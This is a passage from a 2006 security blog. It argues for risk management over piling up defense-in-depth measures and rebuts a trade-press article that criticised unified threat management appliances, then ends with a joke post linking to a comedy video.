Suggesting that you need to have political mojo to ask business unit leaders well-defined, unbiased, interview-based, guided queries is silly.  I’ve done it.  It works.  It doesn’t take a PhD or boardroom experience to pull it off.  I’m not particularly sophisticated and I trained a team of IT (but non-security) folks to do it, too.

But guess what?  It takes WORK.  Lots and lots of WORK.  And it’s iterative, not static.

Because of the fact that Michael’s task list of security admins is so huge, anything that represents a significant investment in time, people or energy usually gets the lowest priority in the grand scheme of things.  That’s the real reason defense-in-depth is such a great hiding place.

With all that stuff to do, you *must* be doing what matters most, right?  You’re so busy!  Unsophisticated, but busy! ๐Ÿ˜‰

Instead of focusing truly on the things that matter, we pile stuff up and claim that we’re doing the best we can with defense in depth without truly understanding that perhaps what we are doing is not the best use of money, time and people afterall.

Don’t cop out.  Risk Management is neither "old school" or a new concept; it’s common sense, it’s reasonable and it’s the right thing to do.

It’s Rational Security.

The Downside of All-in-one Assumptions…

July 16th, 2006 No comments

Assume
I read with some interest a recent Network Computing web posting by Don MacVittie  titled "The Downside of All-in-One Security."  In this post, Don makes some comments that I don’t entirely agree with, so since I can’t sleep, I thought I’d perform an autopsy to rationalize my discomfort.

I’ve posted before regarding Don’s commentary on UTM (this older story is basically the identical story as the one I’m commenting on today?) in which he said:

Just to be entertaining, I’ll start by pointing out that most readers I talk to wouldn’t
consider a UTM at this time. That doesn’t mean most organizations
wouldn’t, there’s a limit to the number I can stay in regular touch
with and still get my job done, but it does say something about the
market.

All I can say is that I don’t know how many readers Don talks to, but the overall UTM market to which he refers can’t be the same UTM market which IDC defines as being set to grow to $2.4 billion in 2009, a 47.9 percent CAGR from 2004-2009.  Conversely, the traditional firewall and VPN appliance market is predicted to decline to $1.3 billion by 2009 with a negative CARG of 4.8%.

The reality is that UTM players (whether perimeter or Enterprise/Service Provider class UTM) continue to post impressive numbers supporting this growth — and customers are purchasing these solutions.  Perhaps they don’t purchase "UTM" devices but rather "multi-function security appliances?" ๐Ÿ™‚ 

I’m just sayin’…

Don leads of with:


Unified Threat Management (UTM) products combine multiple security
functions, such as firewall, content inspection and antivirus, into a
single appliance. The assumption is UTM reduces management hassles by
reducing the hardware in your security infrastructure … but you know
what happens when you assume.

No real problems thus far.  My response to the interrogative posited by the last portion of Don’s intro is: "Yes, sometimes when you assume, it turns out you are correct."  More on that in a moment…


You can slow the spread of security appliances by collapsing many
devices into one, but most organizations struggle to manage the
applications themselves, not the hardware that runs them.

Bzzzzzzzzttttt.  The first half of the sentence is absolutely a valid and a non-assumptive benefit to those deploying UTM.  The latter half makes a rather sizeable assumption, one I’d like substantiated, please.

If we’re talking about security appliances, today there’s little separation between the application and the hardware that runs them.  That’s the whole idea behind appliances.

In many cases, these appliances use embedded software, RTOS in silicon, or very tightly couple the functional and performance foundations of the solution to the binding of the hardware and software combined.

I can’t rationalize someone not worrying about the "hardware," especially when they deploy things like HA clusters or a large number of branch office installations. 

You mean to tell me that in large enterprises (you notice that Don forces me to assume what market he’s referring to because he’s generalizing here…) that managing 200+ firewall appliances (hardware) is not a struggle?  Don talks about the application as an issue.  What about the operating system?  Patches?  Alerts/alarms?  Logs?  It’s hard enough to do that with one appliance.  Try 200.  Or 1000!

Content
inspection, antivirus and firewall are all generally controlled by
different crowds in the enterprise, which means some arm-wrestling to
determine who maintains the UTM solution.

This is may be an accurate assumption in a large enterprise but in a small company (SME/SMB) it’s incredibly likely that the folks managing the CI, AV and firewall *are* the same people/person.  Chances are it’s Bob in accounting!


Then there’s bundling. Some vendors support best-of-breed security
apps, giving you a wider choice. However, each application has to crack
packets individually–which affects performance.

So there’s another assumptive generalization that somehow taking traffic and vectoring it off at high speed/low latency to processing functions highly tuned for specific tasks is going to worsen performance.  Now I know that Don didn’t say it would worsen performance, he said it  "…affect(s) performance," but we all know what Don meant — even if we have to assume. ๐Ÿ˜‰

Look, this is an over-reaching and generalized argument and the reality is that even "integrated" solutions today perform replay and iterative inspection that requires multiple packet visitations with "individual packet cracking" — they just happen to do it in parallel — either monolithically in one security stack or via separate applications.  Architecturally, there are benefits to this approach.

Don’t throw the baby out with the bath water…

How do you think stand-alone non-in-line IDS/IPS works in conjunction with firewalls today in non-UTM environments?  The firewall gets the packet as does the IDS/IPS via a SPAN port, a load balancer, etc…they crack the packets independently, but in the case of IDS, it doesn’t "affect" the firewall’s performance one bit.  Using this analogy, in an integrated UTM appliance, this example holds water, too.

Furthermore, in a UTM approach the correlation for disposition is usually done on the same box, not via an external SEIM…further saving the poor user from having to deploy yet another appliance.  Assuming, of course, that this is a problem in the first place. ๐Ÿ˜‰

I’d like some proof points and empirical data that clearly demonstrates this assumption regarding performance.  And don’t hide behind the wording.  The implication here is that you get "worse" performance.   With today’s numbers from  dual CPU/multi-core processors, huge busses, NPU’s and dedicated hardware assist, this set of assumptions flawed.

Other vendors tweak
performance by tightly integrating apps, but you’re stuck with the
software they’ve chosen or developed.

…and then there are those vendors that tweak performance by tightly integrating the apps and allow the customer to define what is best-of-breed without being "stuck with the software [the vendor has] chosen or developed."  You get choice and performance.  To assume otherwise is to not perform diligence on the solutions available today.  If you need to guess who I am talking about…


For now, the single platform model isn’t right for enterprises large
enough to have a security staff.

Firstly, this statement is just plain wrong.  It *may* be right if you’re talking about deploying a $500 perimeter UTM appliance (or a bunch of them) in the core of a large enterprise, but nobody would do that.  This argument is completely off course when you’re talking about Enterprise-class UTM solutions.

In fact, if you choose the right architecture, assuming the statement above regarding separate administrative domains is correct, you can have the AV people manage the AV, the firewall folks manage the firewalls, etc. and do so in a very reliable, high speed and secure consolidated/virtualized fashion from a UTM architecture such as this.

That said, the sprawl created by
existing infrastructure can’t go on forever–there is a limit to the
number of security-only ports you can throw into the network. UTM will
come eventually–just not today

So, we agree again…security sprawl cannot continue.  It’s an overwhelming issue for both those who need "good enough" security as well as those who need best-of-breed. 

However, your last statement leaves me scratching my head in confused disbelief, so I’ll just respond thusly:

UTM isn’t "coming," it’s already arrived.  It’s been here for years without the fancy title.  The same issues faced in the datacenter in general are the same facing the microcosm of the security space — from space, power, and cooling to administration, virtualization and consolidation — and UTM helps solve these challenges.  UTM is here TODAY, and to assume anything otherwise is a foolish position.

My $0.02 (not assuming inflation)

/Chris

Got a [Security] question? Ask the Ninja…

July 16th, 2006 2 comments

So, like, why is ‘thr33’ the magic number?  The Ninja answers thusly: "Combine the Wizard of Oz, Reign of Fire, and Jonathan Livingston Seagull and you’ll get the picture."  Then again, you probably won’t.

Confused as to just what the hell this has to do with security?   

So am I, so my apologies go out to any real ninjas who happen to be using their spare time away from battling Magons (half monkey/half dragon — firebreathers with a prehensile tail!) and rather than relax with a Sobe and a stepped down pilates session have decided instead to read my security blog.

That happens you know.  All.  The.  Time.

Seriously, though, there is a security reference in here.  Pay attention.  First person who responds in the comments section below as to the security reference gets a free pouch of homemade guacamole.  You pay shipping.

Click on the little ‘play’ icon in the pic below…

Categories: General Rants & Raves Tags: